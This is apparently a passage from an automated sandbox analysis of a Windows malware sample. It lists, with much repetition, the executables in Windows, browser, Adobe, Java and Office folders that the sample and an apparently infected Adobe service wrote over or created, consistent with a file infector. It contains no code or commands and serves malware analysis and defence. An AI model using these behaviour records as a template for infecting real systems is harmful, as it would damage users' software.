            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\vds.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.149\chrome_pwa_launcher.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeJump to behavior
            Source: C:\Users\user\Desktop\SABXJ1B5c8.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.149\elevation_service.exeJump to behavior
            Source: C:\Users\user\Desktop\SABXJ1B5c8.exeSystem file written: C:\Windows\System32\snmptrap.exeJump to behavior
            Source: C:\Users\user\Desktop\SABXJ1B5c8.exeSystem file written: C:\Windows\System32\Spectrum.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Windows Media Player\wmpnetwk.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeJump to behavior
            Source: C:\Users\user\Desktop\SABXJ1B5c8.exeSystem file written: C:\Windows\System32\Locator.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
            Source: C:\Users\user\Desktop\SABXJ1B5c8.exeSystem file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\7-Zip\7z.exeJump to behavior
            Source: C:\Users\user\Desktop\SABXJ1B5c8.exeSystem file written: C:\Windows\System32\AppVClient.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
            Source: C:\Users\user\Desktop\SABXJ1B5c8.exeSystem file written: C:\Windows\SysWOW64\perfhost.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\7-Zip\7zG.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exeJump to behavior
            Source: C:\Users\user\Desktop\SABXJ1B5c8.exeSystem file written: C:\Windows\System32\msiexec.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.149\notification_helper.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.149\Installer\chrmstp.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\TieringEngineService.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\7-Zip\Uninstall.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJump to behavior
            Source: C:\Users\user\Desktop\SABXJ1B5c8.exeSystem file written: C:\Windows\System32\FXSSVC.exeJump to behavior
            Source: C:\Users\user\Desktop\SABXJ1B5c8.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exeJump to behavior
            Source: C:\Users\user\Desktop\SABXJ1B5c8.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
            Source: C:\Users\user\Desktop\SABXJ1B5c8.exeSystem file written: C:\Windows\System32\SensorDataService.exeJump to behavior
            Source: C:\Users\user\Desktop\SABXJ1B5c8.exeSystem file written: C:\Windows\System32\msdtc.exeJump to behavior
            Source: C:\Users\user\Desktop\SABXJ1B5c8.exeSystem file written: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\wbem\WmiApSrv.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
            Source: C:\Users\user\Desktop\SABXJ1B5c8.exeSystem file written: C:\Windows\System32\alg.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\7-Zip\7zFM.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.149\Installer\setup.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\wbengine.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\VSSVC.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\SearchIndexer.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to behavior
            Source: C:\Users\user\Desktop\SABXJ1B5c8.exeSystem file written: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
            Source: C:\Users\user\Desktop\SABXJ1B5c8.exeSystem file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\AgentService.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\OpenSSH\ssh-agent.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Mozilla Firefox\pingsender.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXEJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\vds.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to dropped file
